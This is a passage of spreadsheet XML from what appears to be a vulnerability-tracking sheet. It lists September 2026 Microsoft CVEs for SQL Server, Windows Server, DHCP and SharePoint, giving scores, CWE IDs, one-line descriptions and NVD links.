          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K338" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68776</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K339" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68777</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68778</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68779</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68780</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68781</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68784</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K345" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69297</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-257</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69409</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69497</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69636</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69781</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69839</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K351" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70019</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K352" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-65</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73029</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
